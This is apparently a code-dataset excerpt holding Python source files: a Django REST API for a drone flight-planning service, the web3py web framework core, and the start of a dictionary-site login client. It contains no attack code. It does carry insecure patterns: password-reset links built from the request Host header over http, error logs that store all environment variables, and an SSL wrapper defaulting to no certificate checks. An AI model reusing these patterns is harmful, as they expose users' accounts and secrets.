status=status.HTTP_400_BAD_REQUEST)\n elif request.method == 'GET':\n fp = self.get_object()\n if fp.telemetry:\n telemetry = self._get_telemetry(\n fp,\n fields=('latitude', 'longitude'),\n filter=Q(latitude__isnull=False) & Q(longitude__isnull=False)\n )\n return Response(data=telemetry)\n return Response([])\n\n def _parse_date(self, s, field_name):\n date = dateparse.parse_date(s)\n # parse_date returns None if the string is incorrectly formatted,\n # and raises a ValueError if it's an invalid date (2017-11-42).\n # We just always want a ValueError if something is wrong.\n if not date:\n raise ValueError("Invalid %s, expected format: yyyy-mm-dd." % field_name)\n return date\n\n @list_route(methods=["get"])\n def search_flights(self, request, *args, **kwargs):\n """\n Search flight plans by date window and operator.\n """\n date_start = request.GET.get('date_start') or None\n date_end = request.GET.get('date_end') or None\n operator_id = request.GET.get('operator_id')\n query = models.FlightPlan.objects.filter(\n Q(state=models.FlightPlan.STATE_PLANNED) | Q(state=models.FlightPlan.STATE_COMPLETED),\n operator__is_test=False\n )\n\n if date_start and date_end:\n try:\n date_start = self._parse_date(date_start, "departure date")\n date_end = self._parse_date(date_end, "arrival date")\n except ValueError as e:\n return Response(status=400, data={"message": str(e)})\n\n start_date = datetime.combine(date_start, time.min)\n end_date = datetime.combine(date_end, time.max)\n query = query.filter(\n Q(\n # the departure time is in the time window (between the dates)\n Q(planned_departure_time__gte=start_date,\n planned_departure_time__lte=end_date)\n |\n # the arrival time is in the time window (between the dates)\n Q(planned_arrival_time__gte=start_date,\n planned_arrival_time__lte=end_date)\n |\n # the departure is before the window and the arrival is after it (the window lies inside the flight dates)\n Q(planned_departure_time__lte=start_date,\n planned_arrival_time__gte=end_date)\n )\n )\n\n if operator_id:\n query = query.filter(operator_id=operator_id)\n\n query = query.order_by('-planned_departure_time')\n return Response(data={"plans": serializers.FlightPlanGetSerializer(query, many=True).data})\n\n @action(detail=True, methods=['get'], 
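# --- Hedged editorial sketch (addition, not part of the original source) ----
# The three Q() clauses in search_flights above implement "date ranges
# overlap": a plan matches if it departs in the window, arrives in the
# window, or spans the whole window. An example request, assuming the
# `plans` router prefix registered below (the full URL layout is an
# assumption):
#
#   GET /plans/search_flights/?date_start=2018-01-01&date_end=2018-01-31&operator_id=7
#
# responds with {"plans": [...]} serialized by FlightPlanGetSerializer.
# -----------------------------------------------------------------------------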
permission_classes=[IsOperator])\n def assessments(self, request, *args, **kwargs):\n \"\"\" Retrieve the latest approved assessment, and the latest round of assessments\n \"\"\"\n flightPlan = self.get_object()\n\n assessmentChoices = {}\n\n if 'get_eligible' in request.GET:\n assessmentChoices = assessment.get_eligible(flightPlan)\n elif 'eligible_assessments[]' in request.GET:\n try:\n for assessmentName in request.GET.getlist('eligible_assessments[]'):\n assessmentChoices[assessmentName] = assessment.get_by_name(assessmentName)\n except:\n pass\n\n assessmentInfo = []\n for assessmentName, info in assessmentChoices.items():\n # Get all most recent approved assessemnts\n authorizationAssessmentsQuery = (models\n .Assessment\n .objects\n .filter(name=assessmentName, flight_plan=flightPlan, state__in=models.Assessment.STATES_AUTHORIZE)\n .order_by('-approved_at', '-run_at')\n .values('id', 'state', 'created_at', 'run_at', 'submitted_at', 'approved_at', 'error')\n )\n\n authorizationAssessments = []\n if authorizationAssessmentsQuery.count() > 0:\n authorizationAssessments = authorizationAssessmentsQuery\n for index, authorizationAssessment in enumerate(authorizationAssessments):\n authorizationAssessments[index]['report'] = assessment.get_assessment(authorizationAssessment['id'])\n\n # Get last run assessment\n lastRunAssessmentQuery = (models\n .Assessment\n .objects\n .filter(name=assessmentName, flight_plan=flightPlan)\n .order_by('-run_at')\n .exclude(state__in=models.Assessment.STATES_AUTHORIZE)\n .values('id', 'state', 'created_at', 'run_at', 'submitted_at', 'approved_at', 'error')\n )\n\n lastRunAssessment = None\n if lastRunAssessmentQuery.count() > 0:\n lastRunAssessment = lastRunAssessmentQuery.first()\n lastRunAssessment['report'] = assessment.get_assessment(lastRunAssessment['id'])\n\n assessmentInfo.append({\n \"info\": info,\n \"authorizationAssessments\": authorizationAssessments,\n \"lastRunAssessment\": lastRunAssessment,\n })\n\n return Response(data={\"assessmentInfo\": assessmentInfo})\n\n\n\nrouter.register(r'plans', FlightPlans, base_name='plan')\n\n\nclass MissionTypes(mixins.ListModelMixin, viewsets.GenericViewSet):\n serializer_class = serializers.MissionTypeSerializer\n queryset = models.MissionType.objects.all()\n\nrouter.register(r'mission_types', MissionTypes, 'mission_type')\n\n\nclass Operators(mixins.ListModelMixin, viewsets.GenericViewSet):\n serializer_class = serializers.OperatorSerializer\n queryset = (models.Operator.objects\n .annotate(num_flights=Count('flightplan'))\n .filter(num_flights__gt=0, is_test=False, flightplan__state__in=[models.FlightPlan.STATE_COMPLETED, models.FlightPlan.STATE_PLANNED])\n .order_by(Lower('organization')))\n permission_classes = (IsOperatorOrReadOnly,)\n\nrouter.register(r'operators', Operators, 'operator')\n\n\nclass Manufacturers(mixins.ListModelMixin, viewsets.GenericViewSet):\n serializer_class = serializers.ManufacturerSerializer\n queryset = (\n models.Manufacturer\n .objects\n .order_by(Case(When(id__exact=0, then=Value('00000')), default=Lower('name')))\n )\n\n\nrouter.register(r'manufacturers', Manufacturers, 'manufacturer')\n\n\nclass UserSignupView(generics.ListCreateAPIView):\n permission_classes = (AllowAny, )\n serializer_class = serializers.UserInfoSerializer\n queryset = models.Operator.objects.all()\n\n def create(self, request, *args, **kwargs):\n try:\n return super(UserSignupView, self).create(request, *args, **kwargs)\n except IntegrityError as e:\n content = {'error': \"error %s\" % str(e)}\n return 
Response(content, status=status.HTTP_400_BAD_REQUEST)\n\n\nclass UserUpdateView(generics.RetrieveUpdateAPIView):\n permission_classes = (IsAuthenticated, )\n serializer_class = serializers.UserUpdateSerializer\n queryset = models.Operator.objects.all()\n def update(self, request, *args, **kwargs):\n # Only allow updates to the currently logged in user\n instance = models.Operator.objects.get(user_id=request.user.id)\n serializer = serializers.UserUpdateSerializer(\n instance=instance,\n data=request.data\n )\n serializer.is_valid(raise_exception=True)\n self.perform_update(serializer)\n return Response(data=serializer.data)\n\n\n@api_view(http_method_names=['GET', ])\ndef current_user_details(request):\n if request.auth:\n current_user = User.objects.get(username=request.user)\n operator = models.Operator.objects.get(user=current_user)\n user_details = {\n 'username': current_user.username,\n 'first_name': current_user.first_name,\n 'last_name': current_user.last_name,\n 'email': current_user.email,\n 'id': current_user.id,\n 'organization': operator.organization,\n 'mobile_number': operator.mobile_number,\n 'altitude_unit': operator.altitude_unit,\n }\n else:\n user_details = {'error': 'Unauthorized user - 403'}\n return Response(user_details)\n\nclass UpdatePassword(generics.UpdateAPIView):\n \"\"\"\n An endpoint for changing password.\n \"\"\"\n serializer_class = serializers.ChangePasswordSerializer\n model = get_user_model()\n permission_classes = (IsAuthenticated,)\n\n def get_object(self, queryset=None):\n obj = self.request.user\n return obj\n\n def update(self, request, *args, **kwargs):\n self.object = self.get_object()\n serializer = self.get_serializer(data=request.data)\n\n if serializer.is_valid():\n # Check old password\n if not self.object.check_password(serializer.data.get(\"old_password\")):\n return Response({\"old_password\": [\"Wrong password.\"]}, status=status.HTTP_400_BAD_REQUEST)\n # set_password also hashes the password that the user will get\n self.object.set_password(serializer.data.get(\"new_password\"))\n self.object.save()\n # make sure the user stays logged in\n update_session_auth_hash(request, self.object)\n return Response({'success': True}, status=status.HTTP_200_OK)\n\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n\nclass ResetPassword(generics.CreateAPIView):\n \"\"\"\n Endpoint to get username or email for password reset\n \"\"\"\n serializer_class = serializers.PasswordResetSerializer\n permission_classes = (AllowAny,)\n\n @staticmethod\n def validate_email_address(email):\n try:\n validate_email(email)\n return True\n except ValidationError:\n return False\n\n def create(self, request, *args, **kwargs):\n serializer = self.get_serializer(data=request.data)\n\n\n if serializer.is_valid():\n data = serializer.data.get('email_or_username')\n else:\n return Response({'error': 'Invalid data'}, status=status.HTTP_400_BAD_REQUEST)\n\n if self.validate_email_address(data) is True:\n associated_users= get_user_model().objects.filter(Q(email=data) | Q(username=data))\n if associated_users.exists():\n for user in associated_users:\n c = {\n 'email': user.email,\n 'domain': request.META['HTTP_HOST'],\n 'site_name': settings.SITE_NAME,\n 'uid': urlsafe_base64_encode(force_bytes(user.pk)).decode('utf-8'),\n 'user': user,\n 'token': default_token_generator.make_token(user),\n 'protocol': 'http',\n 'reset_url': '/accounts/reset-password/new/',\n }\n subject_template_name='account/email/password_reset_key_subject.txt'\n 
email_template_name='account/password_reset_from_key.html'\n subject = loader.render_to_string(subject_template_name, c)\n # Email subject *must not* contain newlines\n subject = ''.join(subject.splitlines())\n email = loader.render_to_string(email_template_name, c)\n try:\n send_mail(subject, email, settings.DEFAULT_FROM_EMAIL, [user.email], fail_silently=False)\n except Exception as e:\n return Response({'error': str(e)}, status=status.HTTP_400_BAD_REQUEST)\n return Response({'success': 'Email sent'}, status=status.HTTP_200_OK)\n return Response({'error': 'Username does not exist'}, status=status.HTTP_400_BAD_REQUEST)\n else:\n '''\n If the input is an username, then the following code will lookup for users associated with that user.\n If found then an email will be sent to the user's address\n '''\n associated_users = get_user_model().objects.filter(username=data)\n if associated_users.exists():\n for user in associated_users:\n c = {\n 'email': user.email,\n 'domain': request.META['HTTP_HOST'],\n 'site_name': settings.SITE_NAME,\n 'uid': urlsafe_base64_encode(force_bytes(user.pk)).decode('utf-8'),\n 'user': user,\n 'token': default_token_generator.make_token(user),\n 'protocol': 'http',\n 'reset_url': '/accounts/reset-password/new/',\n }\n subject_template_name = 'account/email/password_reset_key_subject.txt'\n email_template_name = 'account/password_reset_from_key.html'\n subject = loader.render_to_string(subject_template_name, c)\n # Email subject *must not* contain newlines\n subject = ''.join(subject.splitlines())\n email = loader.render_to_string(email_template_name, c)\n try:\n send_mail(subject, email, settings.DEFAULT_FROM_EMAIL , [user.email], fail_silently=False)\n except Exception as e:\n return Response({'error': str(e)}, status=status.HTTP_400_BAD_REQUEST)\n return Response({ 'success': 'Email sent' }, status=status.HTTP_200_OK)\n return Response({ 'error': 'Username does not exist'}, status=status.HTTP_400_BAD_REQUEST)\n\n\nclass ResetPasswordConfirm(generics.CreateAPIView):\n \"\"\"\n Endpoint to confirm password reset\n \"\"\"\n serializer_class = serializers.SetPasswordSerializer\n permission_classes = (AllowAny,)\n\n def create(self, request, *arg, **kwargs):\n UserModel = get_user_model()\n serializer = self.get_serializer(request.data)\n uidb64 = kwargs['uidb64']\n token = kwargs['token']\n\n # assert uidb64 is not None and token is not None # checked by URLconf\n try:\n uid = urlsafe_base64_decode(uidb64).decode('utf-8')\n user = UserModel._default_manager.get(pk=uid)\n except (TypeError, ValueError, OverflowError, UserModel.DoesNotExist):\n user = None\n\n if user is not None and default_token_generator.check_token(user, token):\n new_password = serializer.data['new_password2']\n copy = serializer.data['new_password1']\n if new_password == copy :\n user.set_password(new_password)\n user.save()\n return Response({'success': True}, status=status.HTTP_200_OK)\n return Response(status=status.HTTP_400_BAD_REQUEST)\n\nclass Waypoints(mixins.ListModelMixin, viewsets.GenericViewSet):\n serializer_class = serializers.WaypointSerializer\n permission_classes = (IsOperator,)\n\n def retrieve(self, request, *arg, **kwargs):\n wm = models.WaypointMetadata.objects.get(id=kwargs.get('pk'))\n if self.check_object_permissions(request, wm):\n return Response({'error': \"Unauthorized\"}, status=401)\n\n queryset = models.Waypoint.objects.filter(waypoint_metadata_id=kwargs.get('pk')).order_by('order')\n return Response(data={\n \"waypoints\": serializers.WaypointSerializer(queryset, 
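# --- Hedged editorial note (addition) ----------------------------------------
# DRF's GenericAPIView.check_object_permissions() raises PermissionDenied on
# failure and returns None otherwise, so the
# `if self.check_object_permissions(request, wm):` branch in Waypoints.retrieve
# above can never execute. The usual pattern is to call it bare and let the
# exception propagate:
#
#   self.check_object_permissions(request, wm)  # raises a 403 on failure
# -----------------------------------------------------------------------------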
many=True).data,\n })\n\nrouter.register(r'waypoints', Waypoints, 'waypoints')\n\nclass Assessments(mixins.RetrieveModelMixin,\n mixins.UpdateModelMixin,\n mixins.CreateModelMixin,\n viewsets.GenericViewSet):\n\n permission_classes = (IsOperatorForAssessment,)\n serializer_class = serializers.AssessmentSerializer\n queryset = models.Assessment.objects.all()\n\n def create(self, request, *args, **kwargs):\n \"\"\" Prepare to assess a flight plan\n \"\"\"\n try:\n flightPlanId = request.data['flight_plan_id']\n flightPlan = models.FlightPlan.objects.get(pk=flightPlanId)\n assessment_id = assessment.assess(request.data['short_name'], flightPlan)\n except:\n return Response({'error': \"Error assessing flight plan\"}, status=status.HTTP_400_BAD_REQUEST)\n return Response({'assessment_id': assessment_id}, status=status.HTTP_201_CREATED)\n\n def partial_update(self, request, *args, **kwargs):\n \"\"\" Update state to states like submitting or canceling an authorizated, otherwise refresh\n \"\"\"\n state = request.data['state'] if 'state' in request.data else None\n obj = self.get_object()\n if state == models.Assessment.STATE_SUBMITTING:\n # Submit\n serializer = serializers.AssessmentCreateSerializer(instance=obj.flight_plan, data=request.data)\n serializer.is_valid(raise_exception=True)\n serializer.save()\n try:\n assessment.set_assessment_state(obj, models.Assessment.STATE_SUBMITTING)\n except:\n return Response({'error': 'Error submitting'}, status=status.HTTP_400_BAD_REQUEST)\n return Response({'success': True}, status=status.HTTP_205_RESET_CONTENT)\n\n elif state == models.Assessment.STATE_CANCEL_REQUEST:\n # Cancel\n try:\n assessment.set_assessment_state(obj, models.Assessment.STATE_CANCEL_REQUEST)\n except:\n return Response({'error': 'Error cancelling'}, status=status.HTTP_400_BAD_REQUEST)\n return Response({'success': True}, status=status.HTTP_205_RESET_CONTENT)\n else:\n # Refresh the assessment's state\n try:\n assessment_id = assessment.assess(obj.name, obj.flight_plan)\n except:\n return Response({'error': \"Error assessing flight plan\"}, status=status.HTTP_400_BAD_REQUEST)\n return Response({'assessment_id': assessment_id}, status=status.HTTP_205_RESET_CONTENT)\n return Response({'error': 'Invalid request'}, status=status.HTTP_400_BAD_REQUEST)\n\nrouter.register(r'assessments', Assessments, 'assessments')\n\nclass FlightPlanExport(mixins.ListModelMixin, viewsets.GenericViewSet):\n \"\"\" List flights\n \"\"\"\n serializer_class = serializers.FlightPlanExportSerializer\n permission_classes = (IsExperimentalUser,)\n authentication_classes = (TokenAuthentication,)\n queryset = models.FlightPlan.objects.filter(\n ~Q(state=models.FlightPlan.STATE_DELETED),\n Q(waypoints__country__in=settings.EXPORT_API_COUNTRIES) |\n Q(telemetry__country__in=settings.EXPORT_API_COUNTRIES)\n )\n\nclass FlightPlanExportDetail(mixins.RetrieveModelMixin, viewsets.GenericViewSet):\n \"\"\" Flight detail\n \"\"\"\n serializer_class = serializers.FlightPlanExportDetailSerializer\n permission_classes = (IsExperimentalUser,)\n authentication_classes = (TokenAuthentication,)\n # queryset is further filtered by primary key in `get_object()`\n queryset = models.FlightPlan.objects.all()\n\nexternal_router.register('list', FlightPlanExport, base_name='experimental')\nexternal_router.register('flight', FlightPlanExportDetail, base_name='experimental')\n\n@api_view()\n@renderer_classes([SwaggerUIRenderer, OpenAPIRenderer])\n@permission_classes((AllowAny,))\ndef schema_view(request):\n generator = 
SchemaGenerator(title='log.flights API', patterns=external_router.urls, url='/api/experimental')\n return Response(generator.get_schema())\n","sub_path":"planner/api_views.py","file_name":"api_views.py","file_ext":"py","file_size_in_byte":37522,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"544074042","text":"#!/usr/bin/env python\n\nfrom __future__ import print_function\n\nimport argparse\nimport cgitb\nimport collections\nimport copy\nimport datetime\nimport functools\nimport importlib\nimport inspect\nimport json\nimport linecache\nimport logging\nimport numbers\nimport os\nimport platform\nimport pydoc\nimport re\nimport sys\nimport threading\nimport time\nimport traceback\nimport types\nimport uuid\n\ntry:\n import gunicorn\nexcept:\n gunicorn = None\ntry:\n import gevent; gevent.monkey.patch_all()\nexcept:\n gevent = None\n\nimport jwt # PyJWT\nimport bottle\nimport yatl\nimport pydal\nfrom pydal import Field, _compat\n\n__all__ = ['render', 'DAL', 'Field', 'action', 'request', 'response', 'redirect', 'HTTP', 'Session']\n\nTEMPLATE_500 = """"""\n\nrender = yatl.render\nrequest = bottle.request\nresponse = bottle.response\nredirect = bottle.redirect\n\nclass HTTP(Exception):\n def __init__(self, status, body):\n self.status = status\n self.body = body\n\n#########################################################################################\n# an O(1) LRU cache and memoize with expiration and monitoring (using a linked list)\n#########################################################################################\n\nclass Node(object):\n\n def __init__(self, key=None, value=None, t=None, m=None, prev=None, next=None):\n self.key, self.value, self.t, self.m, self.prev, self.next = key, value, t, m, prev, next\n\nclass Cache(object):\n """\n O(1) caching object that remembers the 'size' most recent values\n Example:\n\n cache = Cache(size=1000)\n h = cache.get(filename, lambda: hash(open(filename).read()), 60, lambda: os.path.getmtime(filename))\n\n (computes and caches the hash of the file filename, but only re-reads the file if its mtime changes and\n does not check the mtime more often than every 60 seconds; 
caches the 1000 most recent hashes)\n """\n\n def __init__(self, size=1000):\n self.free = size\n self.head = Node()\n self.tail = Node()\n self.head.next = self.tail\n self.tail.prev = self.head\n self.mapping = {}\n\n def get(self, key, callback, expiration=3600, monitor=None):\n """Return the cached value for key; re-run callback() if the key is not stored, or if the entry expired and either monitor is None or the monitored value changed."""\n node, t0 = self.mapping.get(key), time.time()\n if node:\n value, t, node.next.prev, node.prev.next = node.value, node.t, node.prev, node.next\n if not node:\n self.free -= 1\n m = monitor and monitor()\n if node and node.t + expiration < t0:\n m = monitor and monitor()\n if m is None or node.m != m:\n node = None\n if node is None:\n value, t = callback(), t0\n new_node = Node(key, value, t, m, prev=self.head, next=self.head.next)\n self.mapping[key] = self.head.next = new_node.next.prev = new_node\n if self.free < 0:\n last_node = self.tail.prev\n self.tail.prev, last_node.prev.next = last_node.prev, self.tail\n del self.mapping[last_node.key]\n self.free += 1\n return value\n\n def memoize(self, expiration=3600):\n def decorator(func):\n @functools.wraps(func)\n def memoized_func(*args, **kwargs):\n key = '%s:%s:%s:%s' % (func.__module__, func.__name__, args, kwargs)\n return self.get(key, lambda args=args, kwargs=kwargs: func(*args, **kwargs), expiration=expiration)\n return memoized_func\n return decorator\n\n#########################################################################################\n# a better json serializer\n#########################################################################################\n\ndef objectify(obj):\n """converts the obj(ect) into a json serializable object"""\n if isinstance(obj, numbers.Integral):\n return int(obj)\n elif isinstance(obj, (numbers.Rational, numbers.Real)):\n return float(obj)\n elif isinstance(obj, (datetime.date, datetime.datetime, datetime.time)):\n return obj.isoformat()\n elif hasattr(obj, 'to_list') and callable(obj.to_list):\n return obj.to_list()\n elif hasattr(obj, '__iter__') or isinstance(obj, types.GeneratorType):\n return list(obj)\n elif hasattr(obj, 'to_dict') and callable(obj.to_dict):\n return obj.to_dict()\n elif hasattr(obj, '__dict__') and hasattr(obj, '__class__'):\n d = copy.copy(obj.__dict__)\n d['__class__'] = obj.__class__.__name__\n return d\n else:\n return str(obj)\n\ndef dumps(obj):\n return json.dumps(obj, default=objectify, sort_keys=True, indent=2)\n\n#########################################################################################\n# Generic Fixture\n#########################################################################################\n\nclass Fixture(object):\n def on_request(self): pass\n def on_error(self): pass\n def on_success(self): pass\n\nclass DAL(pydal.DAL, Fixture):\n def on_request(self): self._adapter.reconnect()\n def on_error(self): self.rollback()\n def on_success(self): self.commit()\n\n#########################################################################################\n# Session logic (uses a signed JWT token stored in a cookie)\n#########################################################################################\n\nclass Session(Fixture):\n def __init__(self, secret, expiration=None, algorithm='HS256'):\n self.secret = secret\n self.expiration = expiration\n self.algorithm = algorithm\n self.local = threading.local()\n def load(self):\n self.local.session_cookie_name = '%s_session' % request.app_name\n enc_data = 
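# --- Hedged editorial sketch (addition): Cache / memoize usage ---------------
# A minimal example of the cache defined above; `expensive()` is a
# hypothetical function used only for illustration:
#
#   cache = Cache(size=100)
#   v1 = cache.get('key', lambda: expensive(), expiration=60)  # computed
#   v2 = cache.get('key', lambda: expensive(), expiration=60)  # cached, v2 == v1
#
#   @cache.memoize(expiration=3600)
#   def slow_add(a, b):
#       return a + b  # computed once per distinct (a, b) within the hour
#
# objectify()/dumps() above make dates, generators and plain objects JSON
# serializable, e.g. dumps({'when': datetime.date(2019, 1, 1)}) yields
# '{\n  "when": "2019-01-01"\n}'.
# -----------------------------------------------------------------------------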
_compat.to_bytes(request.get_cookie(self.local.session_cookie_name))\n self.local.changed = False\n try:\n self.local.data = jwt.decode(enc_data, self.secret, algorithms=[self.algorithm])\n assert self.expiration is None or self.local.data['timestamp'] > time.time() - int(self.expiration)\n except Exception as e:\n self.local.data = {}\n if not 'uuid' in self.local.data:\n self.local.changed = True\n self.local.data['uuid'] = str(uuid.uuid4())\n def get(self, key, default=None):\n return self.local.data.get(key, default)\n def __getitem__(self, key):\n return self.local.data[key]\n def __setitem__(self, key, value):\n self.local.changed = True\n self.local.data[key] = value\n def save(self):\n self.local.data['timestamp'] = time.time() \n enc_data = jwt.encode(self.local.data, self.secret, algorithm = self.algorithm)\n response.set_cookie(self.local.session_cookie_name, _compat.to_native(enc_data))\n def on_request(self):\n self.load()\n def on_error(self):\n if self.local.changed:\n self.save()\n def on_success(self):\n if self.local.changed:\n self.save()\n\n#########################################################################################\n# the action decorator\n#########################################################################################\n\nclass action(object):\n \"\"\"@action(...) is a decorator for functions to be exposed as actions\"\"\"\n\n def __init__(self, path, **kwargs):\n self.path = path\n self.kwargs = kwargs\n self.view = kwargs.pop('view', None)\n self.fixtures = kwargs.pop('fixtures', [])\n\n def __call__(self, function):\n frame = inspect.stack()[1]\n module = inspect.getmodule(frame[0])\n folder = os.path.dirname(os.path.normpath(module.__file__))\n app_name = os.path.split(folder)[-1] ### FIX ME\n path = self.path.replace('/$app_name/', '/%s/' % app_name)\n @bottle.route(path, **self.kwargs)\n @functools.wraps(function)\n def wrapper(*func_args, **func_kwargs):\n try:\n request.app_name = app_name\n [obj.on_request() for obj in self.fixtures]\n output = function(*func_args, **func_kwargs)\n if isinstance(output, dict):\n view = self.view\n if view:\n path = os.path.join(folder, 'templates')\n with open(os.path.join(path, view)) as stream:\n context = dict(request=request)\n context.update(yatl.helpers.__dict__)\n context.update(output)\n output = yatl.render(stream.read(), path=path, context=context, delimiters='[[ ]]')\n else:\n output = dumps(output)\n [obj.on_success() for obj in self.fixtures]\n except HTTP as http:\n [obj.on_success() for obj in self.fixtures]\n raise bottle.HTTPResponse(status=http.status, body=http.body)\n except bottle.HTTPResponse as e:\n [obj.on_success() for obj in self.fixtures]\n raise e\n except:\n try: \n logging.error(traceback.format_exc())\n ticket = log_error(get_error_snapshot())\n [obj.on_error() for obj in self.fixtures] \n except:\n logging.error(traceback.format_exc())\n ticket = \"unknown\"\n output = TEMPLATE_500.format(ticket)\n return output \n return wrapper \n\n\n#########################################################################################\n# monkey patch ssl bug for gevent\n#########################################################################################\n\n__ssl__ = __import__('ssl')\n_ssl = getattr(__ssl__, '_ssl') or getattr(__ssl__, '_ssl2')\n\nif not hasattr(_ssl, 'sslwrap'):\n def new_sslwrap(sock, server_side=False, keyfile=None, certfile=None, \n cert_reqs=__ssl__.CERT_NONE, ssl_version=__ssl__.PROTOCOL_SSLv23, \n ca_certs=None, ciphers=None):\n context = 
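# --- Hedged editorial sketch (addition): wiring an action with fixtures ------
# Example use of the @action decorator defined above; the route, DAL URI and
# template name are illustrative assumptions:
#
#   db = DAL('sqlite://storage.db')
#   session = Session(secret='change-me')
#
#   @action('/$app_name/counter', method='GET',
#           view='counter.html', fixtures=[db, session])
#   def counter():
#       session['visits'] = session.get('visits', 0) + 1
#       return {'visits': session['visits']}
#
# Each fixture's on_request/on_success/on_error hooks wrap the call, so the
# DAL reconnects and commits (or rolls back) and the session cookie is saved
# automatically around every request.
# -----------------------------------------------------------------------------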
__ssl__.SSLContext(ssl_version)\n context.verify_mode = cert_reqs or __ssl__.CERT_NONE\n if ca_certs:\n context.load_verify_locations(ca_certs)\n if certfile:\n context.load_cert_chain(certfile, keyfile)\n if ciphers:\n context.set_ciphers(ciphers)\n caller_self = inspect.currentframe().f_back.f_locals['self']\n return context._wrap_socket(sock, server_side=server_side, ssl_sock=caller_self)\n _ssl.sslwrap = new_sslwrap\n\n#########################################################################################\n# error handling\n#########################################################################################\n\ndef get_error_snapshot(depth=5):\n \"\"\"Return a dict describing a given traceback (based on cgitb.text).\"\"\"\n\n etype, evalue, etb = sys.exc_info()\n if isinstance(etype, type):\n etype = etype.__name__\n\n data = {}\n data['timestamp'] = datetime.datetime.utcnow().isoformat()\n data['python_version'] = sys.version\n platform_keys = [\n 'machine', 'node', 'platform', 'processor', 'python_branch', 'python_build',\n 'python_compiler', 'python_implementation', 'python_revision', 'python_version',\n 'python_version_tuple', 'release', 'system', 'uname', 'version']\n data['platform_info'] = {key: getattr(platform, key)() for key in platform_keys}\n data['os_environ'] = {\n key: pydoc.text.repr(value) for key, value in os.environ.items()}\n data['traceback'] = traceback.format_exc()\n data['exception_type'] = str(etype)\n data['exception_value'] = str(evalue)\n # loopover the stack frames\n items = inspect.getinnerframes(etb, depth)\n del etb # Prevent circular references that would cause memory leaks\n data['stackframes'] = stackframes = []\n for frame, file, lnum, func, lines, index in items:\n file = file and os.path.abspath(file) or '?'\n args, varargs, varkw, locals = inspect.getargvalues(frame)\n # basic frame information\n f = {'file': file, 'func': func, 'lnum': lnum}\n f['code'] = lines\n line_vars = cgitb.scanvars(lambda: linecache.getline(file, lnum), frame, locals)\n # dump local variables (referenced in current line only)\n f['vars'] = {key: pydoc.text.repr(value) for key, value in locals.items() if not key.startswith('__')}\n stackframes.append(f)\n\n return data\n\ndef log_error(error_snapshot):\n uri = os.environ['WEB3PY_SYSTEM_DB_URI']\n db = DAL(uri)\n db.define_table('web3py_error',\n Field('uuid'),\n Field('method'),\n Field('path','string'),\n Field('timestamp','datetime'),\n Field('client_ip','string'),\n Field('snapshot','json'))\n error_uuid = str(uuid.uuid4())\n db.web3py_error.insert(\n uuid=error_uuid,\n method=request.method,\n path=request.path,\n timestamp=datetime.datetime.utcnow(),\n client_ip=request.environ.get('REMOTE_ADDR'),\n snapshot=error_snapshot)\n return error_uuid\n\n#########################################################################################\n# loading/reloading logic\n#########################################################################################\n\nclass Reloader(object):\n \n ERRORS = {}\n\n def __init__(self, folder):\n self.folder = folder\n\n def import_apps(self):\n for app_name in os.listdir(self.folder):\n path = os.path.join(self.folder, app_name)\n if os.path.isdir(path) and not path.endswith('__'):\n try:\n importlib.import_module(path.replace(os.sep, '.'), self.folder)\n Reloader.ERRORS[app_name] = None\n except:\n print(traceback.format_exc())\n Reloader.ERRORS[app_name] = traceback.format_exc()\n @bottle.route('/%s/static/' % app_name)\n def server_static(filename, path=path):\n return 
bottle.static_file(filename, root=os.path.join(path, 'static'))\n\n#########################################################################################\n# find all routes\n#########################################################################################\n\ndef get_routes():\n app = bottle.default_app()\n routes = []\n for route in app.routes:\n func = route.callback\n routes.append({'rule': route.rule,\n 'method': route.method,\n 'filename': func.__module__, #.replace('.',os.sep) + '.py',\n 'action': func.__name__})\n return sorted(routes, key=lambda item: item['rule'])\n\n#########################################################################################\n# web server and reload logic\n#########################################################################################\n\ndef start_server(args):\n host, port = args.address.split(':')\n if args.workers < 1:\n bottle.run(host=host, port=int(port), reloader=True)\n else:\n if not gunicorn:\n logging.error('gunicorn not installed')\n elif not gevent:\n logging.error('gevent not installed')\n else:\n bottle.run(server='gunicorn', host=host, port=int(port),\n workers=args.workers, worker_class='gevent', reloader=True,\n certfile=args.certfile, keyfile=args.keyfile)\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('folder', help='path to the applications folder')\n parser.add_argument('--address', default='127.0.0.1:8000', help='serving address')\n parser.add_argument('--workers', default=0, type=int, help='number of gunicorn workers')\n parser.add_argument('--certfile', default=None, type=str, help='ssl certificate file')\n parser.add_argument('--keyfile', default=None, type=str, help='ssl key file')\n parser.add_argument('--system_db_uri', default='sqlite:memory:', type=str, help='db uri for logging')\n action.args = args = parser.parse_args()\n args.folder = os.path.normpath(args.folder)\n os.environ['WEB3PY_APPLICATIONS'] = args.folder\n os.environ['WEB3PY_SYSTEM_DB_URI'] = args.system_db_uri\n sys.path.append(args.folder)\n reloader = Reloader(args.folder)\n reloader.import_apps()\n\n for item in get_routes():\n print(item)\n start_server(args)\n\nif __name__ == '__main__':\n main()\n","sub_path":"web3py.py","file_name":"web3py.py","file_ext":"py","file_size_in_byte":16901,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"436137135","text":"# -*- coding: utf-8 -*-\nimport os\nimport re\nimport time\nimport json\nimport hashlib\nimport cookielib\nimport urllib\nimport urllib2\nimport sqlite3\nimport pickle\nfrom HTMLParser import HTMLParser\nimport traceback\nfrom PyQt4 import QtCore\nclass Eudict(QtCore.QThread):\n def __init__(self):\n QtCore.QThread.__init__(self)\n def login(self, username, password, rememberme):\n cj = cookielib.CookieJar()\n opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))\n opener.addheaders = [('User-agent', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:58.0) Gecko/20100101 Firefox/58.0')]\n urllib2.install_opener(opener)\n\n authentication_url = 'http://dict.eudic.net/Account/Login?returnUrl=https://my.eudic.net/studylist'\n payload = {\n 'UserName': username,\n 'Password': password,\n 'RememberMe': str(rememberme).lower(),\n 'returnUrl': 'https://my.eudic.net/studylist'\n }\n req = urllib2.Request(authentication_url, urllib.urlencode(payload))\n urllib2.urlopen(req)\n if 'EudicWeb' in str(cj):\n self.__saveCookies(cj)\n return True\n else:\n return False\n\n def __saveCookies(self, 
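# --- Hedged editorial note (addition): why __saveCookies rebuilds cookies ----
# login() above collects cookies in a plain CookieJar; __saveCookies (below)
# copies each cookie into a MozillaCookieJar so it can be written to disk.
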